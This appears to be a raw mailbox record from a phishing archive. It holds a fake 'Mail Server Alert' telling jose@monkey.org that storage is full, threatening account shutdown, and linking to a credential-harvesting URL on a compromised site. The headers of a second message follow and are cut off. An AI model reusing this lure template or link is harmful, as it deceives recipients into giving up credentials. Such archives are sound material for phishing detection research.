From: "Email Administrator" <vinod@vinumac.com>
Date: Mon, 25 Mar 2019 18:30:24 -0700
Message-Id: <20190326031047.3EDCF1B697A6@cloud.bowringcluberp.com>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 67

You will not see this in a MIME-aware mail reader.
--===============0083452806==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

   	  =

   Mail Server Alert =


Dear jose@monkey.org, your email storage has reached 99%, you have 1% left =

  =

  To protect your account, follow the URL below to upgrade your email stora=
ge for free. =


Click here to upgrade jose@monkey.org storage =


Note: =

Note that if you fail to upgrade your email storage, your may suffer loss o=
f email data or permanent account shutdown. =

  =

  This is an auto-generated message sent to: jose@monkey.org =

Do not reply thismail. Replies sent to Mail Server will not be received or =
replied.=20
--===============0083452806==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head>

<body><BR>
<TABLE>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD>
<TABLE style=3D"WIDTH: 780px">
<TBODY>
<TR>
<TD style=3D"HEIGHT: 50px; PADDING-BOTTOM: 30px; PADDING-TOP: 30px; PADDING=
-LEFT: 30px; PADDING-RIGHT: 30px; BACKGROUND-COLOR: #0174df; -moz-border-ra=
dius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-ra=
dius: 5px"><FONT color=3D#fff size=3D+3 face=3Dverdana>Mail Server Alert </=
FONT><BR><BR><FONT color=3D#fff size=3D2 face=3Dverdana>Dear jose@monkey.or=
g, your email storage has reached 99%, you have 1% left </FONT></TD></TR>
<TR>
<TD style=3D"HEIGHT: 5px"></TD></TR>
<TR>
<TD style=3D"HEIGHT: 50px; PADDING-BOTTOM: 30px; PADDING-TOP: 30px; PADDING=
-LEFT: 30px; PADDING-RIGHT: 30px; BACKGROUND-COLOR: #e6e6e6; -moz-border-ra=
dius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-ra=
dius: 5px"><FONT color=3D#000 size=3D2 face=3Dverdana>To protect your accou=
nt, follow the URL below to upgrade your email storage for free. <BR><BR><A=
 href=3D"http://JJGERALDO.COM.BR/.well-known/acme-challenge/huo/update/?ema=
il=3Djose@monkey.org"><FONT size=3D2 face=3Dverdana><B>Click here to upgrad=
e jose@monkey.org storage </B></FONT></A><BR><BR><B>Note:</B> <BR>Note that=
 if you fail to upgrade your email storage, your may suffer loss of email d=
ata or permanent account shutdown. </FONT></TD></TR>
<TR>
<TD style=3D"HEIGHT: 5px"></TD></TR>
<TR>
<TD style=3D"HEIGHT: 40px; PADDING-BOTTOM: 30px; PADDING-TOP: 30px; PADDING=
-LEFT: 30px; PADDING-RIGHT: 30px; BACKGROUND-COLOR: #0174df; -moz-border-ra=
dius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-ra=
dius: 5px"><FONT color=3D#fff size=3D2 face=3Dverdana>This is an auto-gener=
ated message sent to: <B>jose@monkey.org</B> <BR>Do not reply thismail. Rep=
lies sent to Mail Server will not be received or replied. </FONT></TD></TR>=
</TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>
--===============0083452806==--

From jose@monkey.org Wed Apr 18 07:19:44 2018 +0000
Return-Path: tknight@ncwc.edu
Delivered-To: jose@monkey.org
X-FDA: 74067473088.20.war86_8f264a4815a0d
X-Spam-Summary: 75,0,0,8c7e5de3019427c7,d41d8cd98f00b204,tknight@ncwc.edu,:tknight@ncwc.edu,RULES_HIT:10:72:327:334:355:368:369:379:582:599:960:962:967:973:978:983:988:989:1042:1152:1189:1208:1221:1260:1313:1314:1345:1359:1381:1394:1431:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1710:1730:1774:1792:1801:2194:2198:2199:2200:2525:2527:2561:2564:2682:2685:2693:2859:2895:2898:2900:2901:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3352:3586:3650:3865:3867:3868:3870:3871:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4605:5007:6238:6248:6261:6650:6659:6669:6678:8518:8583:8603:8932:8957:9025:9149:9868:10004:10216:10346:11233:11289:11656:11657:11875:11914:12043:12219:12438:12519:12555:12660:12740:12812:12895:12986:13005:13017:13018:13019:13139:13237:13439:13893:14096:14141:14659:21080:21364:21433:21451:21483:21524:21627:21780:30019:30021:30022:30028:30034:30054:30070:30074,0,RBL:66.76.208.171-irl.urbl.hostedemail.com-127.0.0.17
X-HE-Tag: war86_8f264a4815a0d
X-Filterd-Recvd-Size: 38434
Received: from mail.ncwc.edu (ncwcrmtexch02.ncwc.edu [66.76.208.171])
	by imf18.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 18 Apr 2018 07:19:43 +0000 (UTC)
Received: from NCWCRMTEXC01.WesLink.ncwc ([::1]) by NCWCRMTEXC01.WesLink.ncwc
 ([::1]) with mapi id 14.03.0382.000; Wed, 18 Apr 2018 03:19:42 -0400
